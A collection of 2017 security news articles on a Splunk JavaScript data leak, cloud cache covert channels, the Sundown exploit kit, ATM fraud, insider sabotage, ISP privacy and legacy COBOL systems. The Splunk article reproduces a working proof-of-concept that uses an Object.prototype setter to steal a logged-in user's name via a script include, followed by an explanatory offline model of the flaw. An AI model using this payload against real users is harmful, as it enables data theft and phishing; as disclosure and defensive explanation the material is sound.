STE WILLIAMS

That sound you hear is Splunk leaking data

Splunk has patched a slip in its JavaScript implementation that leaks user information.

The advisory at Full Disclosure explains that the leak happens if an attacker tricks an authenticated user into visiting a malicious Web page.

It only leaks the username, and whether or not that user has enabled remote access; but that is enough for an attacker to mount follow-up phishing aimed at the user’s credentials.

The bug, the advisory says, is how Splunk used Object prototypes in JavaScript.

Here’s the proof-of-concept JavaScript from the advisory:

<script>
// Plant a setter for "$C" on Object.prototype: every object that inherits from it,
// the page's global object included, now runs this function when "$C" is assigned.
Object.defineProperty(Object.prototype, "$C", { set: function (val) {
    // The advisory's commented-out phishing prompt, left disabled as in the original
    // (the "\n" escapes were lost in extraction and are restored here).
    //prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername: " + val.USERNAME, "Password")
    for (var i in val) {
        alert("" + i + " " + val[i]);
    }
}});
</script>

<!-- Including the authenticated user's config script from the Splunk host triggers the setter above. -->
<script src="https://VICTIM-IP:8000/en-US/config?autoload=1" type="text/javascript"></script>

The issue affects Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.13.1, 6.1.x before 6.1.13, 6.0.x before 6.0.14, 5.0.x before 5.0.18 and Splunk Light before 6.5.2, and the company has issued patches for all versions. ®
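As an added illustration (not code from the advisory or from Splunk), the following JavaScript models offline why a setter planted on Object.prototype catches the config data, and which shape of response is immune to it. The two config bodies, the field names and the `$C` name are constructed stand-ins, and the `Object.defineProperty(globalThis, ...)` form is assumed as one hardening; the stronger fix is to serve no per-user data from any URL a third-party page can load with a script tag.

```javascript
// Added example, not code from the advisory or from Splunk. It models, offline,
// why the prototype-setter trick leaks and what shape of response is immune to it.

// Constructed stand-in for a script-includable config endpoint. The leaky form
// assigns to an undeclared global: in sloppy-mode script code that is a [[Set]]
// on the global object, which walks the prototype chain and so reaches a setter
// planted on Object.prototype.
const LEAKY_CONFIG_JS =
  '$C = { USERNAME: "alice", REMOTE_ACCESS: true };';

// Constructed hardened form: it defines an own property directly. Defining a
// property never consults inherited accessors, so a setter on Object.prototype
// sees nothing. (The stronger fix is not to serve per-user data from any URL a
// third-party page can load with a <script> tag at all.)
const HARDENED_CONFIG_JS =
  'Object.defineProperty(globalThis, "$C", { value: { USERNAME: "alice", ' +
  'REMOTE_ACCESS: true }, writable: true, configurable: true });';

// Plant a setter on Object.prototype for `name`, as the advisory's PoC does,
// run `fn`, then remove the trap and any global the script created.
function withPrototypeTrap(name, fn) {
  const captured = [];
  Object.defineProperty(Object.prototype, name, {
    configurable: true,
    set(val) { captured.push(val); },
  });
  try {
    fn();
  } finally {
    delete Object.prototype[name];
    delete globalThis[name];
  }
  return captured;
}

// Evaluate the response body in the global scope via indirect eval, which is
// how a cross-origin <script src=...> include runs it in the victim's browser.
function simulateInclude(scriptBody) {
  return withPrototypeTrap('$C', () => (0, eval)(scriptBody));
}

// Field names of the config object that the including page would get to see.
function leakedFields(scriptBody) {
  const seen = simulateInclude(scriptBody);
  return seen.length ? Object.keys(seen[0]) : [];
}

console.log('leaky    :', leakedFields(LEAKY_CONFIG_JS));     // ['USERNAME', 'REMOTE_ACCESS']
console.log('hardened :', leakedFields(HARDENED_CONFIG_JS));  // []
```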

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/03/that_sound_you_hear_is_splunk_leaking_data/

Researchers steal data from CPU cache shared by two VMs

A group of researchers say they can extract information from an Amazon Web Services virtual machine by probing the cache of a CPU it shares with other cloudy VMs.

A paper titled Hello from the Other Side: SSH over Robust Cache Covert Channels in the Cloud (PDF) explains the challenges of extracting data from CPU cache, a very contested resource in which the OS, the hypervisor and applications all conduct frequent operations. All that activity makes a lot of noise, defying attempts to create a persistent communications channel.

Until now, that is: the researchers claim they’ve built “a high-throughput covert channel [that] can sustain transmission rates of more than 45 KBps on Amazon EC2”. They’ve even encrypted it: the technique establishes a TCP network within the cache and transmits data using SSH.

The results sound scarily impressive: a Black Hat Asia session detailing their work promised to peer into a host’s cache and stream video from VM to VM.

The paper explains that this stuff is not entirely new, but that earlier attempts have not been entirely successful because they rested on the assumption that “error-correcting code can be directly applied, and the assumption that noise effectively eliminates covert channels.”

The authors knock both of those arguments over, the first by figuring out a way to handle errors and the second with a method of scheduling communication between two VMs.

The paper details those efforts extensively, names them a “Cache-based Jamming Agreement” and offers working code on GitHub so you can build your own all-in-cache covert channel, either on-premises or in the cloud.

Getting this going in the cloud is non-trivial, because you must first figure out how to get two VMs running on the same host. A 2015 paper titled A Placement Vulnerability Study in Multi-Tenant Public Clouds found that’s possible in Amazon, Google and Azure and is cited by “Hello from the Other Side’s” authors.

Yes, this is a little esoteric. But it also shows why many users are willing to shell out for dedicated instances in their chosen clouds. We can also see that secure multi-tenancy may have a way to go. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/03/31/researchers_steal_data_from_shared_cache_of_two_cloud_vms/

News in brief: jets in near miss with drones; Germany plans cyber-command; adult sites move to HTTPS

Your daily round-up of some of the other stories in the news

Two jets in close shaves with drones

Two commercial jets using London’s Heathrow airport had close shaves with drones, aviation authorities reported on Friday. In its monthly “airprox” report for February, the CAA and MAA said that in the first incident, a drone flew within 20 metres of an Airbus A320 in October last year, while in the second case, also involving an A320, the pilot saw a drone about 50 metres away from his right wing at about 1,000 metres.

Investigators said that in one of the “Category A” incidents, “a collision had only been narrowly avoided”. These incidents bring the number of reported incidents during the past 12 months up to 59, all of which are recorded on an interactive map.

Lawmakers are pondering making the registration of new drones compulsory, while large drones are banned from flying above 121 metres or near airports and airfields.

Germany to launch military cyber-command

With cyber-attacks on nations’ military forces on the rise, Germany will become the latest country to launch a cyber-command next week as it aims to boost its online defences against attacks, Reuters reported.

The defence ministry said some 284,000 attacks against its military had been recorded in just the first nine weeks of 2017, while NATO said that it had seen a five-fold increase in “suspicious events” in the past three years.

The cyber-command, which will be based in Bonn, the former capital of what was then West Germany, will have an equal status to that of the army, navy and air force, and will start off with 260 staff. That’s set to grow to 13,500 by July.

Lieutenant General Ludwig Leinhos, the commander of the unit, said that the unit would both protect the military’s IT infrastructure and develop and war-game offensive tactics: “In order to be able to defend yourself, you have to know the options for attack.”

Adult tube sites switch to HTTPS

If you prefer your entertainment to be of the NSFW and adult kind and are also keen on browsing securely, you’ll be pleased to hear that two of the big porn web clip sites, PornHub and sister site YouPorn, are switching to HTTPS by default: PornHub switched on Thursday and YouPorn will follow suit on April 4.

As The Verge notes, these two sites were two of the 11 adult websites listed on Google’s 100 most visited sites: as of April 4, when these two have made the switch, only five of those will be encrypted.

Shifting to HTTPS means that while ISPs will know you’re browsing an adult site, they won’t be able to see what you were browsing, which should reassure US web users who were dismayed at the move by Congress to downgrade their privacy.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/7UqlwUXV4o0/

US ATM fraud surges despite EMV

Improved technologies in the banking sector have failed to stem the rising tide of fraud in the US, according to a study by analytic software firm FICO.

The US’s belated move to EMV (Europay, MasterCard and Visa) chip-equipped cards hasn’t curtailed fraud as much as many had hoped, based on the successful rollout of the technology years ago across Europe.

The number of payment cards compromised at US ATMs and merchants rose 70 per cent last year. Compromises of ATMs and merchant devices in the US rose 30 per cent, following a six-fold (546 per cent) increase from 2014 to 2015.

These figures cover only card fraud occurring at physical devices, not online card fraud.

It’s a generally bleak picture, with the one bright spot being that vendors are detecting compromised devices more quickly. The average duration of a compromise is steadily decreasing – an ATM or POS device would be compromised on average for 11 days in 2016, compared to 14 days in 2015. The 2016 average duration is less than a third of the average duration two years ago in 2014, which was 36 days.

“As the last few years have proven, skimming technology and knowhow have improved and are more accessible to the general population, so we will continue to see increases in compromises and the speed at which they occur,” said TJ Horan, vice president of fraud solutions at FICO.

FICO works with banks and card issuers around the world to identify fraud trends and curtail card fraud. FICO’s Card Alert Service monitors hundreds of thousands of ATMs and other readers in the US.

More details on trends in ATM and point of sale fraud – together with top tips on how to avoid becoming a victim of fraud – can be found in a blog post by FICO here. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/03/31/us_atm_fraud_trends/

Yee-hacked! Fired Texan sysadmin goes rogue, trashes boot business

A former IT administrator working at a cowboy boot manufacturer has pled guilty to hacking the servers and cloud accounts of his employer after they fired him and had him removed from the building.

Joe Vito Venzor, 41, had been employed by the Lucchese Boot Company in El Paso, Texas, but he was let go on September 1 last year. This didn’t go well – the criminal complaint [PDF] states that he became “volatile” and that it took staff an hour to get him out of the building after his meeting with the IT director.

As a precaution, Venzor’s access rights were revoked as he left the building. However an hour later an “elphaser” administrator account logged onto the company’s network and shut down the corporate email server, followed by its application server, which ran – among other things – the main production line.

The attacker deleted files on the servers to block any attempts for a reboot, and then set to work on the firm’s cloud accounts, shutting them down or changing the passwords. Very quickly the entire company’s IT infrastructure came under attack.

Suspecting the obvious, the IT director investigated Venzor’s work email account and found he had emailed a document to his private email address. The document was a list of network access codes and passwords for various IT subsystems, listed coincidentally in the exact order that the firm’s accounts were in the process of being hacked.

Race against time

Using the list, the director got ahead of the attacker and began changing passwords himself to mitigate some of the damage and lock out illegitimate access after 45 minutes. This was only partially successful and, after three hours of trying to get the servers back online, the other manufacturing and admin staff were told to go home for the day.

The attacker’s work was so effective that the application server was totally borked and the company ended up having to buy a new one and reinstall all the software on it. Outside IT staff had to be brought in to sort out the mess and the firm claims it lost $100,000 in new orders, on top of all the extra IT costs.

During the course of the cleanup, investigators found that Venzor had set up the elphaser account from his work computer, which no one else had access to. The account was designed to look like an innocuous service account, but had full admin privileges where none were needed.

He was arrested shortly after the attack by the FBI and charged with unauthorized intrusion upon protected computers. On Thursday he admitted his crimes and now faces up to 10 years in jail and a possible $250,000 fine, plus paying the costs of his old employer. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/03/31/it_admin_pleads_guilty_to_hacking_bosses/

Good Guy Comcast: We’re not going to sell your data, trust us

Update: US cable giant Comcast is looking to calm public outrage over its newfound ability to sell the browsing histories of its customers.

In a post to the company’s corporate policy blog, chief privacy officer Gerard Lewis vowed not to take advantage of the recently passed legislation limiting the FCC’s ability to protect consumer privacy.

“At Comcast, we respect and protect our customers’ personal information. Always have, always will,” Lewis wrote.

“We do not sell our broadband customers’ individual web browsing history. We did not do it before the FCC’s rules were adopted, and we have no plans to do so.”

Lewis goes on to vow that Comcast, notorious for its poor customer service, will continue to abide by a privacy policy it says was already in compliance with the FCC’s privacy rules for ISPs, and whatever data it does share with advertisers can be opted out of by subscribers.

“Comcast has committed to privacy principles that are consistent with the FTC’s privacy regime, which has applied to all entities in the Internet ecosystem for over 20 years and which continues to apply to Internet edge companies like Google, Facebook, and Amazon,” the Comcast privacy chief and deputy general counsel said.

“We believe this commitment is legally enforceable in multiple ways, including by state Attorneys General.”

That is not to say, however, that Comcast has anything against this week’s controversial legislation. Rather, Lewis argues, people are making too much of the effort to put consumer privacy squarely in the hands of those who stand to make money by exploiting it.

“In view of all the misinformation and inaccurate statements that have been made in the last week, we want to make sure that our customers understand how strong our privacy protections really are,” says Lewis.

“So we will revise our privacy policy to make more clear and prominent that, contrary to the many inaccurate statements and reports, we do not sell our customers’ individual web browsing information to third parties and that we do not share sensitive information unless our customers have affirmatively opted in to allow that to occur.”

Comcast says its customers shouldn’t worry about having their browsing histories or personal information sold off by Comcast, because the cable giant doesn’t have any immediate plans to do so. And if they do decide to change that policy, customers should rely on the state governments to stand up to a company that writes its own laws in many places.

In short, Comcast may be able to sell out its customers now, but customers should trust them not to.

And who can you trust, if not the company that once changed a customer’s name to “Asshole Brown” out of spite? ®

Updated to add

Comcast is not the only ISP promising to play nice. Verizon, which was recently caught using illegal “supercookies” to track users, says of selling browser histories: “We don’t do it and that’s the bottom line.”

Meanwhile, AT&T, the carrier that was fined by the FCC for letting scammers insert bogus charges onto customer bills, says it “had the same protections in place the day before the Congressional resolution was passed, and we will have the same protections the day after President Trump signs the CRA into law.”

Like Comcast, both carriers have less-than-stellar histories of protecting customer privacy, and both now believe customers should simply take their word that the new-found freedoms to deal in personal info for profit will not be abused.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/03/31/comcast_we_will_never_sell_your_data/

‘Sundown’ Rises as New Threat in Depleted Exploit Kit Landscape

New exploits and obfuscation tactics have made once second-tier EK a potent threat, researchers from Cisco Talos say.

Attacks involving the use of exploit kits dropped off dramatically and have remained low ever since Russian authorities arrested over four-dozen individuals believed to be associated with the Angler EK last year. But a few kits remain active and continue to pose a threat to users.

One of them is Sundown, an exploit kit that many considered relatively unsophisticated a few months ago but has gradually evolved into a substantial threat.

Researchers from Cisco’s Talos who have been tracking the kit this week described Sundown as having matured into a major player within the exploit landscape since they last saw it.

“Many of the ‘calling cards’ that have historically been associated with Sundown have been removed, possibly indicating that the threat actors are making an attempt to make it more difficult to identify as Sundown,” says Talos threat researcher Edmund Brumaghin. “Sundown is now one of the most heavily leveraged exploit kits since the disappearance of several larger exploit kits.”

Many of the exploit kit’s original identifiers have been stripped, making it harder to spot. For instance, previous versions of the EK used to contain multiple references to the Yugoslavian Business Network, making it easily identifiable. Those references are now missing. Missing too in new versions of Sundown are the numeric subfolders and numeric file names and proper extensions that were the markers of the old EK.

Several new exploits have been added to Sundown, while some, like those targeting vulnerabilities in the Silverlight browser plugin, have been dropped. Among the new exploits is one that is based on a publicly available proof of concept targeting a recently disclosed vulnerability in the Microsoft Edge browser. Sundown is one of the few EKs in the world that have added new exploits in recent months, according to Talos.

Sundown also appears to have adopted a new approach to compromising systems. Unlike other kits that use just a single exploit to try and compromise a system, Sundown deploys its entire collection of malware tools against a potential victim. The approach, while noisy, appears designed to give the EK the best chance of breaking into a system, Talos said in the alert.

Sundown has changed in other ways as well. Previously for instance, the exploit kit would retrieve its payload via the web browser. The current version of Sundown retrieves the payload via the command line and the use of a Windows service for executing VBScript files.

The approach is similar to, and indeed appears borrowed from, the one used by another malware kit—RIG-v—to retrieve its payload. Sundown’s payloads now reside on a different server from the one it uses to host its landing page and exploit pages. “The use of different servers for hosting exploit payloads indicates that the actors behind Sundown may be experimenting with more complex infrastructure design for the exploit kit,” Brumaghin says.

One of the most significant changes to the Sundown EK campaign is the use of domain resellers to collect domains for hosting Sundown activity. The authors of the kit appear to be buying legitimately registered domains in bulk from resellers in an apparent bid to avoid blacklists and other filters. In many cases, the authors of Sundown are looking for domains that have been registered for at least one week to avoid filters that block domains that have just been registered.

“Several of the largest, most heavily leveraged Exploit Kits [such as] Angler, Neutrino, Nuclear, have largely disappeared from the threat landscape,” Brumaghin says. “Sundown has remained operational and this increased development and maturation may be indicative of their desire to fill the void left behind by the other larger exploit kits that have stopped operations.”

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …

Article source: http://www.darkreading.com/attacks-breaches/sundown-rises-as-new-threat-in-depleted-exploit-kit-landscape/d/d-id/1328535?_mc=RSS_DR_EDT

Trump Extends Obama’s EO for Sanctioning Hackers

EO ultimately led to sanctions against Russia for hacking and other attempts to tamper with the outcome of the US election.

President Donald J. Trump has quietly extended for one year the “national emergency” executive order issued by his predecessor Barack Obama that ultimately led to the sanctions and retaliatory measures taken by the Obama administration against Russian officials for that nation’s role in hacking activities targeting the US election.

“On April 1, 2015, by Executive Order 13694, the President declared a national emergency pursuant to the International Emergency Economic Powers Act (50 U.S.C. 1701-1706) to deal with the unusual and extraordinary threat to the national security, foreign policy, and economy of the United States constituted by the increasing prevalence and severity of malicious cyber-enabled activities originating from, or directed by persons located, in whole or in substantial part, outside the United States. On December 28, 2016, the President issued Executive Order 13757 to take additional steps to address the national emergency declared in Executive Order 13694.

“These significant malicious cyber-enabled activities continue to pose an unusual and extraordinary threat to the national security, foreign policy, and economy of the United States. For this reason, the national emergency declared on April 1, 2015, must continue in effect beyond April 1, 2017. Therefore, in accordance with section 202(d) of the National Emergencies Act (50 U.S.C. 1622(d)), I am continuing for 1 year the national emergency declared in Executive Order 13694.”

The official filing is here in the Federal Register.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise …

Article source: http://www.darkreading.com/risk/trump-extends-obamas-eo-for-sanctioning-hackers/d/d-id/1328536?_mc=RSS_DR_EDT

Not just a load of old COBOLers: systems are still running on old code

So, we started with a report on “legacy” COBOL systems still being in use and a report suggesting this represented a security risk, since the writers of those systems have retired and are dying off. We wanted a quick sanity check and found ourselves pinned to a wall of naivete pretty quickly. One technology journalist we spoke to, for example, reckoned there might be a few machines out there running Windows XP but only a handful, and nothing older.

At the personal computing level this might be right. On a corporate level and looking at the systems on which many people depend for their daily functions, it couldn’t be more wrong. The study we were looking at, from SSRN, covered the American IRS system. It also covered 2015’s breach of the US Office of Personnel Management, both of which run on old COBOL systems. Asking around, we found the same was true of British systems and banks internationally.

So if no-one’s able to update these things, is the security automatically compromised?

Nuanced ‘legacy’

Simon Bevan, who worked for IBM for 25 years from the 1960s, was at pains to point out that “legacy” had to encompass only things that were no longer maintained. This didn’t mean they were no longer fit for purpose, however. He was one of the developers behind IPARS, the original airline reservation code, from which most of the modern equivalents have evolved. He says:

Needless to say, there are not many of us left who could help if things went wrong. Whatever the case, the core reservations code is extremely stable and running in a stable and well maintained environment.

Reassuringly, he and his team gave some thought to the longevity of the systems they were developing at the time (he was also part of the first online banking system, for the Bank of Montreal). He added:

Knowing the complexity and cost of designing these core systems, I assumed that they would continue to exist at the centre of any subsequent extensions of the original applications.

The development priority in the then foreseeable future would be to capitalise on the original systems by extending their capabilities rather than rewriting the core functions. At that time, it was IBM’s strategy to protect the customers’ development investment by guaranteeing system compatibility into the future.

Others saw potential issues. Oliver Kraus, IT consultant, said:

You have two main security concerns – the one is of the technology itself, and the second is of your own code. Since the first kind is generic, the more chances someone will know of the vulnerability, but the more chances there will be a solution or a ‘patch’ to cover for it. Because of the high costs of developing the software from scratch, the need to teach all of the developers a new technology, and the risk of creating bugs or security vulnerabilities, many CTOs prefer to keep the old technology.

Job for life

The ageing developer population remains an issue for many, however. Anthony Peake, managing director at Software Solved, said the public sector is one of the few areas in which the notion of the “job for life” still retains any clout. This is why it’s only now coming to light that there is an ageing system problem. He added:

Those who are coming in or just entering the software profession, understandably, don’t want to learn code and systems that are decades old. Equally, those who do understand and have worked with COBOL and other legacy systems such as Delphi, are now coming to the end of their careers or have simply forgotten how to work with the tool. There are specialists but they cost a lot.

So is there an actual risk? He thinks so.

A number of government bodies simply bury their heads in the sand. Budget restrictions or lack of skills simply means that everything stays the same. This, of course, opens them up to other risks. COBOL and Delphi were secure at the time of implementation, but the world has moved on considerably and new threats such as injection attacks are simply not covered by legacy software.

The sheer size of the risk has also increased. Systems now might be on the public internet or part of a wider corporate network, again not considered when the original systems were implemented, putting public data at risk.

John Walker, visiting professor at the School of Computing and Informatics, Nottingham Trent University, and owner and MD of Secure-Bastion Ltd, puts it pretty bluntly:

At the end of the day it is a case of ‘security through obscurity’ versus ‘devoid security through confusion’. On one hand, we have the inferred security represented by say, non-routable protocols, or mainframe speciation partitions such as LPAR. On the other side of the security coin we have unpatched outdated systems such as NT4.0 residing inside virtualisation. No matter, the outcomes are the same: confusion, and a very big potential for unknown unknowns of insecurity to reside within the operational environment.

Bevan goes back to fundamentals to address the issue. Buy systems from established vendors who have some longevity and who maintain their systems. Of course, patch everything, and design your own software in a modular fashion so that you can incorporate new functions and features easily.

Treat data as you would treat money. Always control access to data and always encrypt databases, but be aware that this is protection against casual copying not against insider activity.

And don’t forget that technology doesn’t exist in any sort of vacuum, adds Bevan:

Continuously update the application logic to accommodate changes in the real world. Regularly review, enhance and document the component functions. Review the technologies, environment and supporting facilities upon which your software depends.

And if you have an older developer in your workforce, be nice to them. They may turn out to be extremely important…


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/KhCpJJBbzMw/
